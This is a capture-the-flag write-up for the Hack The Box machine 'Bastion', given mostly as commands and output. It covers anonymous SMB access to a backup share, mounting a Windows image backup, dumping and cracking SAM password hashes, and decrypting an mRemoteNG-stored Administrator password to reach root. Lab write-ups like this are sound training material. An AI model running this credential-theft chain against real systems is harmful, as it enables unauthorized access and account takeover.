Details
This machine is Bastion from Hack The Box
Recon
Started by looking for services
root@kali:~# nmap -sV -p- -T4 10.10.10.134
Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-13 21:48 BST
Stats: 0:00:45 elapsed; 0 hosts completed (1 up), 1 undergoing Service Scan
Service scan Timing: About 46.15% done; ETC: 21:49 (0:00:20 remaining)
Nmap scan report for 10.10.10.134
Host is up (0.035s latency).
Not shown: 65522 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH for_Windows_7.9 (protocol 2.0)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
49664/tcp open msrpc Microsoft Windows RPC
49665/tcp open msrpc Microsoft Windows RPC
49666/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49668/tcp open msrpc Microsoft Windows RPC
49669/tcp open msrpc Microsoft Windows RPC
49670/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 83.73 seconds
User
I started on SMB
root@kali:~# smbclient -L 10.10.10.134
Enter WORKGROUP\root's password:
Just hit enter
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
Backups Disk
C$ Disk Default share
IPC$ IPC Remote IPC
So I mounted the backups share
root@kali:~# mount -v //10.10.10.134/Backups /tmp/mounted
Password for root@//10.10.10.134/Backups:
I just hit enter
root@kali:/tmp/mounted# ls -la
total 29
drwxr-xr-x 2 root root 4096 Apr 16 11:02 .
drwxrwxrwt 17 root root 20480 Jun 13 21:52 ..
-r-xr-xr-x 1 root root 116 Apr 16 11:10 note.txt
-rwxr-xr-x 1 root root 0 Feb 22 12:43 SDT65CB.tmp
drwxr-xr-x 2 root root 0 Feb 22 12:44 WindowsImageBackup
I'll take a look at this
root@kali:/tmp/mounted# cat note.txt
Sysadmins: please don't transfer the entire backup file locally, the VPN to the subsidiary office is too slow.
Whats in the backup folder
root@kali:/tmp/mounted# cd WindowsImageBackup/
root@kali:/tmp/mounted/WindowsImageBackup# ls -la
total 4
drwxr-xr-x 2 root root 0 Feb 22 12:44 .
drwxr-xr-x 2 root root 4096 Jun 13 21:56 ..
drwxr-xr-x 2 root root 0 Feb 22 12:45 L4mpje-PC
root@kali:/tmp/mounted/WindowsImageBackup/L4mpje-PC# ls -la
total 8
drwxr-xr-x 2 root root 4096 Feb 22 12:45 .
drwxr-xr-x 2 root root 0 Feb 22 12:44 ..
drwxr-xr-x 2 root root 0 Feb 22 12:45 'Backup 2019-02-22 124351'
drwxr-xr-x 2 root root 0 Feb 22 12:45 Catalog
-rwxr-xr-x 1 root root 16 Feb 22 12:44 MediaId
drwxr-xr-x 2 root root 0 Feb 22 12:45 SPPMetadataCache
root@kali:/tmp/mounted/WindowsImageBackup/L4mpje-PC# cd 'Backup 2019-02-22 124351'/
This directory had 2 vhd files, I mounted the larger one
root@kali:/tmp/mounted/WindowsImageBackup/L4mpje-PC/Backup 2019-02-22 124351
And looked inside
root@kali:/tmp/vh1# ls -la
total 2096765
drwxrwxrwx 1 root root 12288 Feb 22 12:39 .
drwxrwxrwt 21 root root 20480 Jun 13 22:06 ..
drwxrwxrwx 1 root root 0 Feb 22 12:39 '$Recycle.Bin'
-rwxrwxrwx 1 root root 24 Jun 10 2009 autoexec.bat
-rwxrwxrwx 1 root root 10 Jun 10 2009 config.sys
lrwxrwxrwx 2 root root 14 Jul 14 2009 'Documents and Settings' -> /sysroot/Users
-rwxrwxrwx 1 root root 2147016704 Feb 22 12:38 pagefile.sys
drwxrwxrwx 1 root root 0 Jul 14 2009 PerfLogs
drwxrwxrwx 1 root root 4096 Jul 14 2009 ProgramData
drwxrwxrwx 1 root root 4096 Apr 12 2011 'Program Files'
drwxrwxrwx 1 root root 0 Feb 22 12:39 Recovery
drwxrwxrwx 1 root root 4096 Feb 22 12:43 'System Volume Information'
drwxrwxrwx 1 root root 4096 Feb 22 12:39 Users
drwxrwxrwx 1 root root 16384 Feb 22 12:40 Windows
So I went to check the SAM file
root@kali:/tmp/vh1/Windows/System32/config# samdump2 ./SYSTEM ./SAM
*disabled* Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
*disabled* Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:26112010952d963c8dc4217daec986d9:::
I put the L4mpje one into a file called crack.txt and set john on it
root@kali:~# john crack.txt --wordlist=/usr/share/wordlists/rockyou.txt --format=NT
Using default input encoding: UTF-8
Loaded 1 password hash (NT [MD4 128/128 SSE2 4x3])
Warning: no OpenMP support for this hash type, consider --fork=12
Press 'q' or Ctrl-C to abort, almost any other key for status
bureaulampje (L4mpje)
1g 0:00:00:00 DONE (2019-06-13 22:31) 1.123g/s 10556Kp/s 10556Kc/s 10556KC/s buresres..burdy1
Use the "--show --format=NT" options to display all of the cracked passwords reliably
Session completed
The creds are
L4mpje:bureaulampje
So I tested them on ssh
root@kali:~# ssh [email protected]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
l4mpje@BASTION C:\Users\L4mpje>
Get my flag
l4mpje@BASTION C:\Users\L4mpje\Desktop>type user.txt
[REDACTED]
System
A file called mRemoteNG was installed, which I found contained a config file with credentials
l4mpje@BASTION C:\Users\L4mpje\AppData\Roaming\mRemoteNG>type confCons.xml
[SNIP]
Userna
me="Administrator" Domain="" Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
[SNIP]
I found a tool to decrypt the password https://github.com/kmahyyg/mremoteng-decrypt/blob/master/mremoteng_decrypt.py
root@kali:~# python3 mremoteng_decrypt.py -s "aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
Password: thXLHM96BeKL0ER2
I used this on ssh
root@kali:~# ssh [email protected]
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
administrator@BASTION C:\Users\Administrator>
So I grabbed my flag
administrator@BASTION C:\Users\Administrator\Desktop>type root.txt
[REDACTED]